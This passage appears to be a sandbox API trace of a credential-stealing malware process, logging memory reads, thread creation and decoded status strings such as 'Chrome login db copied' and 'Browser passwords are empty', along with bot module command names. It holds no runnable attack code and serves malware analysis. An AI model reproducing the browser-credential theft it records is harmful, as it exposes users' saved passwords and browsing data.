	[0201.054] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100e7d08, lpBuffer=0x26ce2e8, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x26ce2e8*, lpNumberOfBytesRead=0x248fe0c*=0x3ff) returned 1
	[0201.054] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x26ce2e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47
	[0201.054] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x60) returned 0x22620e8
	[0201.054] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x26ce2e8, cbMultiByte=-1, lpWideCharStr=0x22620e8, cchWideChar=47 | out: lpWideCharStr="Chrome login db should be copied (copy absent)") returned 47
	[0201.054] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x16ef5fc, lpBuffer=0x225748, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225748*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0201.054] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225748, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0201.054] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306618
	[0201.054] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225748, cbMultiByte=-1, lpWideCharStr=0x2306618, cchWideChar=8 | out: lpWideCharStr="browser") returned 8
	[0201.054] SetEvent (hEvent=0x49c) returned 1
	[0201.061] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225390) returned 1
	[0201.061] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26ce2e8) returned 1
	[0201.061] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225748) returned 1
	[0201.061] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692e78
	[0201.061] lstrcmpiW (lpString1="DEBG", lpString2="ModuleQuery") returned -1
	[0201.061] lstrcmpiW (lpString1="DEBG", lpString2="WantRelease") returned -1
	[0201.061] lstrcmpiW (lpString1="DEBG", lpString2="VERS") returned -1
	[0201.061] lstrcmpiW (lpString1="DEBG", lpString2="SINJ") returned -1
	[0201.061] lstrcmpiW (lpString1="DEBG", lpString2="DINJ") returned -1
	[0201.061] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad2e8
	[0201.061] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x2306578, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0x510) returned 0x4dc
	[0204.064] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cb748
	[0204.064] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0204.064] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x102
	[0204.064] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x2251f8
	[0204.064] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x400) returned 0x2772bb8
	[0204.064] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225390
	[0204.065] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0204.065] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x16ef7e0, lpBuffer=0x2251f8, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x2251f8*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0204.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2251f8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0204.065] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff858
	[0204.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2251f8, cbMultiByte=-1, lpWideCharStr=0x22ff858, cchWideChar=5 | out: lpWideCharStr="DEBG") returned 5
	[0204.065] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100e7d6c, lpBuffer=0x2772bb8, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x2772bb8*, lpNumberOfBytesRead=0x248fe0c*=0x3ff) returned 1
	[0204.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2772bb8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 23
	[0204.065] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6228
	[0204.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2772bb8, cbMultiByte=-1, lpWideCharStr=0x22a6228, cchWideChar=23 | out: lpWideCharStr="Chrome login db copied") returned 23
	[0204.065] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x16ef5fc, lpBuffer=0x225390, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225390*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0204.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225390, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0204.065] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cb770
	[0204.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225390, cbMultiByte=-1, lpWideCharStr=0x26cb770, cchWideChar=8 | out: lpWideCharStr="browser") returned 8
	[0204.065] SetEvent (hEvent=0x49c) returned 1
	[0204.067] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2251f8) returned 1
	[0204.069] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2772bb8) returned 1
	[0204.069] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225390) returned 1
	[0204.069] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cb798
	[0204.069] lstrcmpiW (lpString1="DEBG", lpString2="ModuleQuery") returned -1
	[0204.069] lstrcmpiW (lpString1="DEBG", lpString2="WantRelease") returned -1
	[0204.069] lstrcmpiW (lpString1="DEBG", lpString2="VERS") returned -1
	[0204.069] lstrcmpiW (lpString1="DEBG", lpString2="SINJ") returned -1
	[0204.069] lstrcmpiW (lpString1="DEBG", lpString2="DINJ") returned -1
	[0204.069] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff870
	[0204.069] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x26cb748, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0xc18) returned 0x538
	[0207.091] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cbb30
	[0207.091] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0207.091] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x102
	[0207.091] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x2251f8
	[0207.091] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x400) returned 0x22d7220
	[0207.091] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225638
	[0207.091] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0207.091] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x16ef7e6, lpBuffer=0x2251f8, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x2251f8*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0207.091] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2251f8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0207.091] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff5d0
	[0207.091] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2251f8, cbMultiByte=-1, lpWideCharStr=0x22ff5d0, cchWideChar=5 | out: lpWideCharStr="DEBG") returned 5
	[0207.091] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100e7d38, lpBuffer=0x22d7220, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x22d7220*, lpNumberOfBytesRead=0x248fe0c*=0x3ff) returned 1
	[0207.091] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x22d7220, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49
	[0207.091] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x70) returned 0x22c7eb8
	[0207.091] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x22d7220, cbMultiByte=-1, lpWideCharStr=0x22c7eb8, cchWideChar=49 | out: lpWideCharStr="Chrome webdata db should be copied (copy absent)") returned 49
	[0207.091] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x16ef5fc, lpBuffer=0x225638, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225638*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0207.091] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225638, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0207.091] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cba90
	[0207.091] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225638, cbMultiByte=-1, lpWideCharStr=0x26cba90, cchWideChar=8 | out: lpWideCharStr="browser") returned 8
	[0207.091] SetEvent (hEvent=0x49c) returned 1
	[0207.095] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2251f8) returned 1
	[0207.095] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22d7220) returned 1
	[0207.095] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225638) returned 1
	[0207.095] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cbae0
	[0207.102] lstrcmpiW (lpString1="DEBG", lpString2="ModuleQuery") returned -1
	[0207.102] lstrcmpiW (lpString1="DEBG", lpString2="WantRelease") returned -1
	[0207.102] lstrcmpiW (lpString1="DEBG", lpString2="VERS") returned -1
	[0207.102] lstrcmpiW (lpString1="DEBG", lpString2="SINJ") returned -1
	[0207.102] lstrcmpiW (lpString1="DEBG", lpString2="DINJ") returned -1
	[0207.102] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff630
	[0207.102] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x26cbb30, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0x308) returned 0x4a4
	[0207.103] Sleep (dwMilliseconds=0xbb8) 
	[0207.106] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cbb08
	[0207.106] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0207.106] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x102
	[0207.106] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225638
	[0207.106] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x400) returned 0x22d7220
	[0207.106] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x2251f8
	[0207.106] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0207.107] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x16ef7e0, lpBuffer=0x225638, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225638*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0207.107] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225638, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0207.107] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff648
	[0207.107] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225638, cbMultiByte=-1, lpWideCharStr=0x22ff648, cchWideChar=5 | out: lpWideCharStr="DEBG") returned 5
	[0207.107] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100e7d84, lpBuffer=0x22d7220, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x22d7220*, lpNumberOfBytesRead=0x248fe0c*=0x3ff) returned 1
	[0207.107] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x22d7220, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 25
	[0207.107] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x40) returned 0x22c6db0
	[0207.107] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x22d7220, cbMultiByte=-1, lpWideCharStr=0x22c6db0, cchWideChar=25 | out: lpWideCharStr="Chrome webdata db copied") returned 25
	[0207.107] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x16ef5fc, lpBuffer=0x2251f8, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x2251f8*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0207.107] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2251f8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0207.107] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cbb80
	[0207.107] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2251f8, cbMultiByte=-1, lpWideCharStr=0x26cbb80, cchWideChar=8 | out: lpWideCharStr="browser") returned 8
	[0207.107] SetEvent (hEvent=0x49c) returned 1
	[0207.147] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225638) returned 1
	[0207.156] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22d7220) returned 1
	[0207.156] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2251f8) returned 1
	[0207.156] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cbba8
	[0207.156] lstrcmpiW (lpString1="DEBG", lpString2="ModuleQuery") returned -1
	[0207.409] lstrcmpiW (lpString1="DEBG", lpString2="WantRelease") returned -1
	[0207.409] lstrcmpiW (lpString1="DEBG", lpString2="VERS") returned -1
	[0207.409] lstrcmpiW (lpString1="DEBG", lpString2="SINJ") returned -1
	[0207.409] lstrcmpiW (lpString1="DEBG", lpString2="DINJ") returned -1
	[0207.409] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff618
	[0207.409] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x26cbb08, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0x20c) returned 0x544
	[0207.409] Sleep (dwMilliseconds=0xbb8) 
	[0207.418] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cbbd0
	[0207.418] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0207.418] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x102
	[0207.418] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x2251f8
	[0207.418] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x400) returned 0x22d7220
	[0207.418] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225638
	[0207.418] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0207.418] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x174f52d, lpBuffer=0x2251f8, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x2251f8*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0207.418] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2251f8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0207.418] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff600
	[0207.418] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2251f8, cbMultiByte=-1, lpWideCharStr=0x22ff600, cchWideChar=5 | out: lpWideCharStr="DPST") returned 5
	[0207.419] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x174f623, lpBuffer=0x22d7220, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x22d7220*, lpNumberOfBytesRead=0x248fe0c*=0x3ff) returned 1
	[0207.419] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x22d7220, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 28
	[0207.419] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x40) returned 0x22c6f18
	[0207.419] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x22d7220, cbMultiByte=-1, lpWideCharStr=0x22c6f18, cchWideChar=28 | out: lpWideCharStr="Browser passwords are empty") returned 28
	[0207.419] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x174f01c, lpBuffer=0x225638, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225638*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0207.419] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225638, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0207.419] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cbbf8
	[0207.419] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225638, cbMultiByte=-1, lpWideCharStr=0x26cbbf8, cchWideChar=8 | out: lpWideCharStr="browser") returned 8
	[0207.419] SetEvent (hEvent=0x49c) returned 1
	[0207.419] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2251f8) returned 1
	[0207.419] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22d7220) returned 1
	[0207.419] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225638) returned 1
	[0207.419] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cbc20
	[0207.419] lstrcmpiW (lpString1="DPST", lpString2="ModuleQuery") returned -1
	[0207.419] lstrcmpiW (lpString1="DPST", lpString2="WantRelease") returned -1
	[0207.419] lstrcmpiW (lpString1="DPST", lpString2="VERS") returned -1
	[0207.419] lstrcmpiW (lpString1="DPST", lpString2="SINJ") returned -1
	[0207.419] lstrcmpiW (lpString1="DPST", lpString2="DINJ") returned 1
	[0207.419] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff5e8
	[0207.419] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x26cbbd0, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0x150) returned 0x4a0
	[0207.420] Sleep (dwMilliseconds=0xbb8) 
	[0207.434] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cc508
	[0207.434] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0207.434] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0207.434] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cc508) returned 1
	[0207.434] Sleep (dwMilliseconds=0xbb8) 
	[0207.449] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cc508
	[0207.449] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0207.449] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0207.449] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cc508) returned 1
	[0207.450] Sleep (dwMilliseconds=0xbb8) 
	[0207.562] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cc580
	[0207.789] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0207.789] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0207.789] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cc580) returned 1
	[0207.789] Sleep (dwMilliseconds=0xbb8) 
	[0207.824] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b07f0
	[0207.824] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0207.824] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0207.824] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26b07f0) returned 1
	[0207.824] Sleep (dwMilliseconds=0xbb8) 
	[0207.848] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b07f0
	[0207.850] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0207.851] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0207.853] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26b07f0) returned 1
	[0207.854] Sleep (dwMilliseconds=0xbb8) 
	[0207.996] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b07f0
	[0207.996] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0207.996] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0207.996] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26b07f0) returned 1
	[0207.996] Sleep (dwMilliseconds=0xbb8) 
	[0208.011] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b07f0
	[0208.011] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0208.011] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0208.011] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26b07f0) returned 1
	[0208.011] Sleep (dwMilliseconds=0xbb8) 
	[0208.027] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0c00
	[0208.027] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0208.027] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0208.027] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26b0c00) returned 1
	[0208.027] Sleep (dwMilliseconds=0xbb8) 
	[0208.043] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1088
	[0208.044] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0208.246] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0208.246] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26b1088) returned 1
	[0208.247] Sleep (dwMilliseconds=0xbb8) 
	[0208.261] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b13a8
	[0208.261] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0208.261] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0208.261] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26b13a8) returned 1
	[0208.261] Sleep (dwMilliseconds=0xbb8) 
	[0208.276] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cb860
	[0208.305] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0208.305] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0208.305] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cb860) returned 1
	[0208.305] Sleep (dwMilliseconds=0xbb8) 
	[0208.326] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cb860
	[0208.326] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0208.326] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0208.326] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cb860) returned 1
	[0208.326] Sleep (dwMilliseconds=0xbb8) 
	[0208.339] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cbfb8
	[0208.339] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0208.339] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0208.339] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbfb8) returned 1
	[0208.339] Sleep (dwMilliseconds=0xbb8) 
	[0208.354] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cbfb8
	[0208.354] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0208.354] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0208.354] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbfb8) returned 1
	[0208.354] Sleep (dwMilliseconds=0xbb8) 
	[0208.370] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b16f0
	[0208.370] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0208.370] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0208.370] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26b16f0) returned 1
	[0208.370] Sleep (dwMilliseconds=0xbb8) 
	[0208.386] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1bc8
	[0208.386] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0208.387] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0208.388] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26b1bc8) returned 1
	[0208.388] Sleep (dwMilliseconds=0xbb8) 
	[0208.409] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1bc8
